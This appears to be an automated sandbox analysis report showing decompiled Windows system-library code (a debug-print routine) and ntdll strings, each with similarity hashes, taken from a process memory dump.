                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E00FEB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                          				signed int _t65;
                          				signed short _t69;
                          				intOrPtr _t70;
                          				signed short _t85;
                          				void* _t86;
                          				signed short _t89;
                          				signed short _t91;
                          				intOrPtr _t92;
                          				intOrPtr _t97;
                          				intOrPtr* _t98;
                          				signed short _t99;
                          				signed short _t101;
                          				void* _t102;
                          				char* _t103;
                          				signed short _t104;
                          				intOrPtr* _t110;
                          				void* _t111;
                          				void* _t114;
                          				intOrPtr* _t115;
                          
                          				_t109 = __esi;
                          				_t108 = __edi;
                          				_t106 = __edx;
                          				_t95 = __ebx;
                          				_push(0x90);
                          				_push(0x10bf7a8);
                          				E0103D0E8(__ebx, __edi, __esi);
                          				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                          				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                          				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                          				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                          				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                          				if(__edx == 0xffffffff) {
                          					L6:
                          					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                          					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                          					__eflags = _t65 & 0x00000002;
                          					if((_t65 & 0x00000002) != 0) {
                          						L3:
                          						L4:
                          						return E0103D130(_t95, _t108, _t109);
                          					}
                          					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                          					_t108 = 0;
                          					_t109 = 0;
                          					_t95 = 0;
                          					__eflags = 0;
                          					while(1) {
                          						__eflags = _t95 - 0x200;
                          						if(_t95 >= 0x200) {
                          							break;
                          						}
                          						E0102D000(0x80);
                          						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                          						_t108 = _t115;
                          						_t95 = _t95 - 0xffffff80;
                          						_t17 = _t114 - 4;
                          						 *_t17 =  *(_t114 - 4) & 0x00000000;
                          						__eflags =  *_t17;
                          						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                          						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                          						_t102 = _t110 + 1;
                          						do {
                          							_t85 =  *_t110;
                          							_t110 = _t110 + 1;
                          							__eflags = _t85;
                          						} while (_t85 != 0);
                          						_t111 = _t110 - _t102;
                          						_t21 = _t95 - 1; // -129
                          						_t86 = _t21;
                          						__eflags = _t111 - _t86;
                          						if(_t111 > _t86) {
                          							_t111 = _t86;
                          						}
                          						E0102F3E0(_t108, _t106, _t111);
                          						_t115 = _t115 + 0xc;
                          						_t103 = _t111 + _t108;
                          						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                          						_t89 = _t95 - _t111;
                          						__eflags = _t89;
                          						_push(0);
                          						if(_t89 == 0) {
                          							L15:
                          							_t109 = 0xc000000d;
                          							goto L16;
                          						} else {
                          							__eflags = _t89 - 0x7fffffff;
                          							if(_t89 <= 0x7fffffff) {
                          								L16:
                          								 *(_t114 - 0x94) = _t109;
                          								__eflags = _t109;
                          								if(_t109 < 0) {
                          									__eflags = _t89;
                          									if(_t89 != 0) {
                          										 *_t103 = 0;
                          									}
                          									L26:
                          									 *(_t114 - 0xa0) = _t109;
                          									 *(_t114 - 4) = 0xfffffffe;
                          									__eflags = _t109;
                          									if(_t109 >= 0) {
                          										L31:
                          										_t98 = _t108;
                          										_t39 = _t98 + 1; // 0x1
                          										_t106 = _t39;
                          										do {
                          											_t69 =  *_t98;
                          											_t98 = _t98 + 1;
                          											__eflags = _t69;
                          										} while (_t69 != 0);
                          										_t99 = _t98 - _t106;
                          										__eflags = _t99;
                          										L34:
                          										_t70 =  *[fs:0x30];
                          										__eflags =  *((char*)(_t70 + 2));
                          										if( *((char*)(_t70 + 2)) != 0) {
                          											L40:
                          											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                          											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                          											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                          											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                          											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                          											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                          											 *(_t114 - 4) = 1;
                          											_push(_t114 - 0x74);
                          											L0103DEF0(_t99, _t106);
                          											 *(_t114 - 4) = 0xfffffffe;
                          											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                          											goto L3;
                          										}
                          										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                          										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                          											goto L40;
                          										}
                          										_push( *((intOrPtr*)(_t114 + 8)));
                          										_push( *((intOrPtr*)(_t114 - 0x9c)));
                          										_push(_t99 & 0x0000ffff);
                          										_push(_t108);
                          										_push(1);
                          										_t101 = E0102B280();
                          										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                          										if( *((char*)(_t114 + 0x14)) == 1) {
                          											__eflags = _t101 - 0x80000003;
                          											if(_t101 == 0x80000003) {
                          												E0102B7E0(1);
                          												_t101 = 0;
                          												__eflags = 0;
                          											}
                          										}
                          										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                          										goto L4;
                          									}
                          									__eflags = _t109 - 0x80000005;
                          									if(_t109 == 0x80000005) {
                          										continue;
                          									}
                          									break;
                          								}
                          								 *(_t114 - 0x90) = 0;
                          								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                          								_t91 = E0102E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                          								_t115 = _t115 + 0x10;
                          								_t104 = _t91;
                          								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                          								__eflags = _t104;
                          								if(_t104 < 0) {
                          									L21:
                          									_t109 = 0x80000005;
                          									 *(_t114 - 0x90) = 0x80000005;
                          									L22:
                          									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                          									L23:
                          									 *(_t114 - 0x94) = _t109;
                          									goto L26;
                          								}
                          								__eflags = _t104 - _t92;
                          								if(__eflags > 0) {
                          									goto L21;
                          								}
                          								if(__eflags == 0) {
                          									goto L22;
                          								}
                          								goto L23;
                          							}
                          							goto L15;
                          						}
                          					}
                          					__eflags = _t109;
                          					if(_t109 >= 0) {
                          						goto L31;
                          					}
                          					__eflags = _t109 - 0x80000005;
                          					if(_t109 != 0x80000005) {
                          						goto L31;
                          					}
                          					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                          					_t38 = _t95 - 1; // -129
                          					_t99 = _t38;
                          					goto L34;
                          				}
                          				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                          					__eflags = __edx - 0x65;
                          					if(__edx != 0x65) {
                          						goto L2;
                          					}
                          					goto L6;
                          				}
                          				L2:
                          				_push( *((intOrPtr*)(_t114 + 8)));
                          				_push(_t106);
                          				if(E0102A890() != 0) {
                          					goto L6;
                          				}
                          				goto L3;
                          			}
                          0x01044908
                          0x0104490e
                          0x00000000
                          0x00000000
                          0x01044910
                          0x01044917
                          0x01044917
                          0x00000000
                          0x01044917
                          0x00feb1ba
                          0x010447f9
                          0x010447fc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010447fc
                          0x00feb1c0
                          0x00feb1c0
                          0x00feb1c3
                          0x00feb1cb
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: _vswprintf_s
                          • String ID:
                          • API String ID: 677850445-0
                          • Opcode ID: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
                          • Instruction ID: 4acca2f3dfe0f84f097eef1dd9c31b29ab7f904f08ccaccfe8415c9ac5a8e1fd
                          • Opcode Fuzzy Hash: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
                          • Instruction Fuzzy Hash: 2A51C1B5D0025A8BEB21CF688885BAEBBF0BF00714F2041BDD899EB282D7754D45DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: PATH
                          • API String ID: 0-1036084923
                          • Opcode ID: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
                          • Instruction ID: cca27a16bf92238830b7feba0443c06178e5c8320f1ecf613b25f0b1912722cc
                          • Opcode Fuzzy Hash: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
                          • Instruction Fuzzy Hash: F6C18071D00219DFDB25DF99D881BEEBBF1FF48750F248069E981AB294D738A941CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0105BE0F
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                          • API String ID: 0-865735534
                          • Opcode ID: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
                          • Instruction ID: e8382970fc5a2d65bfd155e3eb680463d8e8f5685f145ddc1b5ef14940604bb8
                          • Opcode Fuzzy Hash: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
                          • Instruction Fuzzy Hash: 77A1F431B0060A8BEB61DB68C4507BEB7E5BF44714F0445A9EE82CB695DB38E805DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: RTL: Re-Waiting
                          • API String ID: 0-316354757
                          • Opcode ID: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
                          • Instruction ID: 33a3bcffa4be35dd66d0adbbbb7ecde21907ecf3c5952ac853c4377697afbf16
                          • Opcode Fuzzy Hash: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
                          • Instruction Fuzzy Hash: 87615671E00A969FDB72DB69C840BBE77ECEB84324F1402A6D991972C1D7349D019782
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: `
                          • API String ID: 0-2679148245
                          • Opcode ID: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
                          • Instruction ID: af6782fd764b6ebd0c37c1b4aad757565a746bdfba7fd8dbad8f360d486e4db5
                          • Opcode Fuzzy Hash: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
                          • Instruction Fuzzy Hash: B5519A713043829BE325DF28E8D4B9BBBE5EB84704F04096DFAC687690D771E805CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                          • Instruction ID: 8fdc252dfe0d6c5d905de37420e6de76e9be9535c9558e5b9a07d9786e5ff2c5
                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                          • Instruction Fuzzy Hash: 85518F716047119FD321DF29C840AABBBF9FF48750F00892DFA9597690E7B4E914CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: BinaryHash
                          • API String ID: 0-2202222882
                          • Opcode ID: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
                          • Instruction ID: 89d7be19221ae4357cf1ace0147799c841b77539bd02bb48f30a7a9ee2c44224
                          • Opcode Fuzzy Hash: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
                          • Instruction Fuzzy Hash: CD4142F1D0052DABDB21DA50CC85FEEB77CAB54714F0085A5EA49AB241DB319E888FE4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: `
                          • API String ID: 0-2679148245
                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                          • Instruction ID: 8f8828e649ad0adde63528c3903b2256daef612217638f83c7c50d1dcaf3490c
                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                          • Instruction Fuzzy Hash: C431E232700306ABE710DE28CC85FDB7BE9AB88754F144229FA949B284D770E904C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: BinaryName
                          • API String ID: 0-215506332
                          • Opcode ID: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
                          • Instruction ID: abc62330088f1cb655fa51e9ca1aee9a0d5264c94ab0b686c16cdd741b950524
                          • Opcode Fuzzy Hash: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
                          • Instruction Fuzzy Hash: BF31E832D0051AAFEB16DA58C945EAFB7B8FB44720F014169E998AB251D7319E00CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
                          • Instruction ID: ca14e4fdd16c7439f7763d37c1c05a328750590d319476f86225a275e18cb6be
                          • Opcode Fuzzy Hash: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
                          • Instruction Fuzzy Hash: 15318DB1508305AFD361DF68C9849AFBBE8EB99654F004A2EF9D483250D739DD04CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: WindowsExcludedProcs
                          • API String ID: 0-3583428290
                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                          • Instruction ID: c783135cc6a4f70489bb8d137e949dc63ce2adf953483c82da9aca5cb66aaaaf
                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                          • Instruction Fuzzy Hash: 7F21F877A4112DEBDB229A598880FEB77ADFF51B60F154465FA84DB210D731DC00E7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Actx
                          • API String ID: 0-89312691
                          • Opcode ID: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
                          • Instruction ID: 3c3391eab8ead43a6fa658cd2b53713e99f00440e09b966be73b18e317ebbfd1
                          • Opcode Fuzzy Hash: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
                          • Instruction Fuzzy Hash: 0811BE35304A038BFBB78E1C849073A76D5BB85664F24456AE9E9CB3D1EBB0C841A343
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          • Critical error detected %lx, xrefs: 01098E21
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Critical error detected %lx
                          • API String ID: 0-802127002
                          • Opcode ID: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
                          • Instruction ID: 64696c56d821fdeb713962ba62a81f2dca78ba59eaf1ba9eb00c9498db4c34ac
                          • Opcode Fuzzy Hash: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
                          • Instruction Fuzzy Hash: 8F1175B5D00348EADF24DFA889157DCBBB4BB05311F20825EE1A9AB392C3340602DF14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0107FF60
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                          • API String ID: 0-1911121157
                          • Opcode ID: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
                          • Instruction ID: 22e82df3c7b1381ea6e4eb39bbf7a8bc22f609627ef3b63b6ed7ea72e4f0cb2c
                          • Opcode Fuzzy Hash: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
                          • Instruction Fuzzy Hash: C4110475910545EFDB22EB54CC48FD8BBF2FF04714F548084F5885B2A1CB399940DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 95aa16ea2516f0dfb26490a8b731dafcb3e68955373fb0c10d72aab8068b533b
                          • Instruction ID: bbdfdef7dd33e46af40618fbcafff32cf3e695039f872339ba39271305e0eed4
                          • Opcode Fuzzy Hash: 95aa16ea2516f0dfb26490a8b731dafcb3e68955373fb0c10d72aab8068b533b
                          • Instruction Fuzzy Hash: CF42487590122A8FDB64CF68C880BE9BBF1FF49704F1481EAD98DAB242D7359985CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e50e5af74cf17f0db54baa250871adcc7f74f50beb42e1d80b438203cfba688
                          • Instruction ID: 145932e766d84c0b6bf606a46736bbb711e624f2dd80aa0cdc7229e9d1058075
                          • Opcode Fuzzy Hash: 7e50e5af74cf17f0db54baa250871adcc7f74f50beb42e1d80b438203cfba688
                          • Instruction Fuzzy Hash: 8AF18D706082118FE765CF19C480A7AB7E1FF88714F45896EFAC6CB291E738D981CB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8d322600b27b8e734f63d0ad488313bd2759941f1163b11cd98e3d192a5d455
                          • Instruction ID: cc636def472893938a569dd11de42e03a4e54261d53da5ac9eb7cf3793bb1200
                          • Opcode Fuzzy Hash: b8d322600b27b8e734f63d0ad488313bd2759941f1163b11cd98e3d192a5d455
                          • Instruction Fuzzy Hash: 61F102316083419FEBA6CF2CC8407AF7BE1AF95324F24859DE9D59B285D739D841CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9cacdaf3047092d59a97bc7254e42187e52022ef62e0015de226f230f18712ff
                          • Instruction ID: 6fb51acb59f20522c2877c12fc0ce250e60e1bdc0cce265baeafb91d4780d94d
                          • Opcode Fuzzy Hash: 9cacdaf3047092d59a97bc7254e42187e52022ef62e0015de226f230f18712ff
                          • Instruction Fuzzy Hash: C8E1D271A013198FEB34DF29C880BB9B7B2BF85314F1441E9DA899B2A1DB34DD81DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1199b2a88efe83d8cc3c4be2698c36ca56869a08c78743d6e3e56e416fcbab4e
                          • Instruction ID: fe1b3f665e4d3a216fc5ee96dbba2d065b2203e1230272d9cfadc7591e037b1a
                          • Opcode Fuzzy Hash: 1199b2a88efe83d8cc3c4be2698c36ca56869a08c78743d6e3e56e416fcbab4e
                          • Instruction Fuzzy Hash: CBB18FB1E00209DFDB15DF98C984BAEBBB5BF48354F204129E645AB355DB74AC42DB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8035dfebaf3b74db4286fcba9aa22d21b6f5120a4e59bc744b3ec9d2d956fe2
                          • Instruction ID: 83049ef9dcb2c374849a235ed24b54e404256e4837f4472eb7aa50790d5caa2f
                          • Opcode Fuzzy Hash: b8035dfebaf3b74db4286fcba9aa22d21b6f5120a4e59bc744b3ec9d2d956fe2
                          • Instruction Fuzzy Hash: E8C130755093818FD394CF28C480A5AFBE1BF89304F544AAEF9D98B392D735E845CB42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8839e148b833daef377447e4ad663115ca87575722f5a49366a5942c9282bf4
                          • Instruction ID: c3e968f067e96caa4a9417e80f07f41a99be4a726ee6f86d293658605e134f65
                          • Opcode Fuzzy Hash: d8839e148b833daef377447e4ad663115ca87575722f5a49366a5942c9282bf4
                          • Instruction Fuzzy Hash: 68910971E002159FEB71AA6CC844BEE7BE4AB05714F0502A5FDD1EB2D9EB789C80C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bf27210d58167a73c32a324ad19fc6633702eed789df4818a98a4f191a2ffe05
                          • Instruction ID: 781ee5f66caf191f3464b30122eb50fc78bf57d00a4892c98ad7a8118e926f20
                          • Opcode Fuzzy Hash: bf27210d58167a73c32a324ad19fc6633702eed789df4818a98a4f191a2ffe05
                          • Instruction Fuzzy Hash: 8381A2756042428BEBA6CE58C880B7F77E9FB84350F54486AEEC59B241D330DD45DBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9cbeeebc94c8073f57b1f1deb302ca1e4635101666575ebe8111091fd796559a
                          • Instruction ID: bd58453a90ab2cea533d9b3df92666b8f684408af7b5e5c2c4acf7a7e1c6c1c8
                          • Opcode Fuzzy Hash: 9cbeeebc94c8073f57b1f1deb302ca1e4635101666575ebe8111091fd796559a
                          • Instruction Fuzzy Hash: 4D710132A00702AFE732EF18CC44FAABBE5EF44724F144568E6D5876A0DBB5E940CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                          • Instruction ID: 7d4dab4bbff64a98d51aa9b0d907e67a8dd4c3c3adade51848820e6cda7f93a2
                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                          • Instruction Fuzzy Hash: 86717C71A0061AEFDB11DFA8C984AEEBBF9FF48714F104069E545E7290DB34AA41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15b063e5f15a25ef6bc6fcd21bc4783dc8eb73d704864131b3d534a3d2296737
                          • Instruction ID: 31c2e80bd2175854b6f4eb26d31e4dfb3707a9291b089906fecd16ec9f94e5a9
                          • Opcode Fuzzy Hash: 15b063e5f15a25ef6bc6fcd21bc4783dc8eb73d704864131b3d534a3d2296737
                          • Instruction Fuzzy Hash: CF51FC71205792ABD322EF29C841B67BBE4FF50B14F10082EF6C597662E774E804DB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 061ed355c686e3cc166f059a8aec042baaa32ca542b0f2ce5973a60fa12614d3
                          • Instruction ID: ce2f959345b10d6cae98992690af84014f318e19235f786b2fd214a3ad5a74ff
                          • Opcode Fuzzy Hash: 061ed355c686e3cc166f059a8aec042baaa32ca542b0f2ce5973a60fa12614d3
                          • Instruction Fuzzy Hash: A851A176A00125CFCB18DF1CC8909BDB7F1FB88700725845AE9C6DB369D739AA91CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f019b8a1f7af73c593a0a786e4626c2fdc84743e3cf075e00e73a386019e6333
                          • Instruction ID: 6592edc9dcdfb9e5f126d76fb0f30d45417a932de5115773e201f9e428e95b3b
                          • Opcode Fuzzy Hash: f019b8a1f7af73c593a0a786e4626c2fdc84743e3cf075e00e73a386019e6333
                          • Instruction Fuzzy Hash: 7E41F471700611DBE72ADAE9C894B7BB7DEAF94720F84825AFED6872D0D734D801C690
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1197f10770dc1659f7b0c2fce117ecb8ab03a8985a204fe012eac07b5c8ef2d
                          • Instruction ID: d66cbc83e01bbd13a3ea965374bf5301609076fbdbfba77775c40afbdf460354
                          • Opcode Fuzzy Hash: c1197f10770dc1659f7b0c2fce117ecb8ab03a8985a204fe012eac07b5c8ef2d
                          • Instruction Fuzzy Hash: 2E51C375A01606DFDB16DFE8C480B9EFBF1BF48310F24815AD995A7385DB31A944CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                          • Instruction ID: acd7c75c5c6f4bee580a0204eb6e4f62658d239eccf29f15ad638d3c3eb39435
                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                          • Instruction Fuzzy Hash: 7351F331E0424D9FDB24CF68C0D07BEBBB1AF45324F2881B8D645933A2C775A989E791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
